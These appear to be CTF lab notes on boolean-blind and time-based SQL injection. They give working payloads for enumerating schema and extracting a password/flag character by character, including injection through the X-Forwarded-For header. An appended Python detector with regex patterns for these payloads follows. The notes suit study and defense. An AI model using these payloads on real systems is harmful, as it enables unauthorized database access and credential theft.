Injection
I. Boolean blind injection (brute force)
1. Database name length; n is the length value substituted in
username=admin' and (length(database()))=n#&password=1111
Result: 4
2. Database name
(1) Database name. {1}: character position, range 1-4; {2}: ASCII code value, range 33-126
username=admin'and ascii(substr(database(),{1},1))={2}#&password=1111
Result: test
3. Get the number of tables and the table name lengths
(1) Determine the table name length. {1}: range 0-7; {2}: length, 1-20
username=admin'and (select length(table_name) from information_schema.tables where table_schema =database()limit {1},1)={2}#&password=1111
Results ({1} -> length): 0 -> 9, 1 -> 4
4. Get the number of columns
(1) Determine the number of columns: limit 0,1 and limit 1,1
username=admin'and (select column_name from information_schema.columns where table_name =0x75736572 and table_schema=database() limit 1,1)>0#&password=1111
Column count determined: 2
5. Get the column name lengths
(1) Determine the length. {1}: range 0-1; {2}: length, 1-20
username=admin'and (select length(column_name) from information_schema.columns where table_name = 0x75736572 and table_schema=database() limit {1},1)={2}#&password=1111
Results ({1} -> length): 0 -> 8, 1 -> 8
6. Get the column names (brute force)
(1) Column names, limit 0,1 and limit 1,1. {1}: 1-8; {2}: ASCII code value, range 33-126
username=admin'and ascii(substr((select column_name from information_schema.columns where table_name =0x75736572 and table_schema=database() limit 1,1),{1},1))={2}#&password=1111
Column names obtained: username,password
7. Get the length of the password field
(1) Length {1}: ASCII code value, range 33-126
username=admin'and (select length(password) from test.user limit 0,1)={1}#&password=1111
Result: 13
8. Get the field content
(1) Field content. {1}: character position, range 1-13; {2}: ASCII code value, range 33-126
username=admin'and ascii(substr((select password from test.user limit 0,1),{1},1))={2}#&password=1111
Result: Flag{dkypxzx}
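II. Time-based injection
1. Guess the database name character by character -- unverified
Time-based blind injection
http://www.any.com:88/sqli/Less-9/?id=1' and sleep( if(ascii(substr(database(),1,1))<116,0,5 )) #
If the equals sign is filtered out, < or > can be used instead.
2. Time-based blind injection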
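http://ctf5.shiyanbar.com/web/wonderkun/index.php
Challenge hint: "I am going to record everyone who attacks me in the db!", so this is very likely an injection challenge. Testing shows that the response echoes back whatever is supplied in X-Forwarded-For, so the guess is injection through an HTTP header.
With a hint like this, the usual guess is that there is a table named flag with a column named flag.
Brute-force the column length: the value whose Response time exceeds 5s is the length. (If the guessed length exceeds the fixed length, the response time also exceeds 5s, presumably because of an overflow, so take the smallest payload value whose time exceeds 5s.)
(1) Brute-force the length of the flag column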
X-Forwarded-For: 1' and (select case when (select length(flag) from flag limit 1)=§32§ then sleep(5) else 1 end) and '1'='1
(2) Brute-force the ASCII value of each character of the column
X-Forwarded-For:1' and (select case when (select ord (substring(flag from §{1}§ for 1 )) from flag limit 1)=§{2}§ then sleep(5) else 1 end ) and '1'='1
This yields the flag string.
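
A defender's view of the procedure above, as an added example that is not part of the original notes: the per-character brute force repeats one payload template with only the numbers changing, so it can be spotted in logged parameter and header values. The signature names, the threshold and the sample events are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures for the payload shapes in these notes only (assumed names, not a full ruleset).
SIGNATURES = {
    "char_extraction": re.compile(r"(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I),
    "length_probe": re.compile(r"length\s*\(\s*database\s*\(|select\s+length\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

def classify(value):
    """Sorted signature names matched by one parameter or header value."""
    text = unquote_plus(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def template(value):
    """Collapse digit runs so requests differing only in position/guess share a key."""
    return re.sub(r"\d+", "N", unquote_plus(value).lower())

def find_enumeration(events, threshold=3):
    """events: (client, field, value). Report (client, field) pairs that repeat one
    matching template at least `threshold` times: the brute-force loop itself."""
    counts, tags = Counter(), {}
    for client, field, value in events:
        hit = classify(value)
        if hit:
            key = (client, field, template(value))
            counts[key] += 1
            tags[key] = hit
    return {(c, f): tags[(c, f, t)] for (c, f, t), n in counts.items() if n >= threshold}

# Constructed sample events (documentation IP ranges), shaped like the payloads above.
SAMPLE = (
    [("203.0.113.5", "username", f"admin'and ascii(substr(database(),{p},1))={g}#")
     for p, g in [(1, 116), (2, 101), (3, 115)]]
    + [("198.51.100.7", "X-Forwarded-For",
        f"1' and (select case when (select ord(substring(flag from {p} for 1)) "
        f"from flag limit 1)={g} then sleep(5) else 1 end) and '1'='1")
       for p, g in [(1, 70), (1, 71), (2, 108)]]
    + [("192.0.2.9", "username", "admin"), ("192.0.2.9", "username", "o'brien"),
       ("192.0.2.9", "X-Forwarded-For", "10.0.0.1")]
)

if __name__ == "__main__":
    for who, why in find_enumeration(SAMPLE).items():
        print(who, why)
```

The header case matters because values such as X-Forwarded-For are often written to a database without the validation applied to form fields; binding every such value as a query parameter removes the oracle that both techniques depend on.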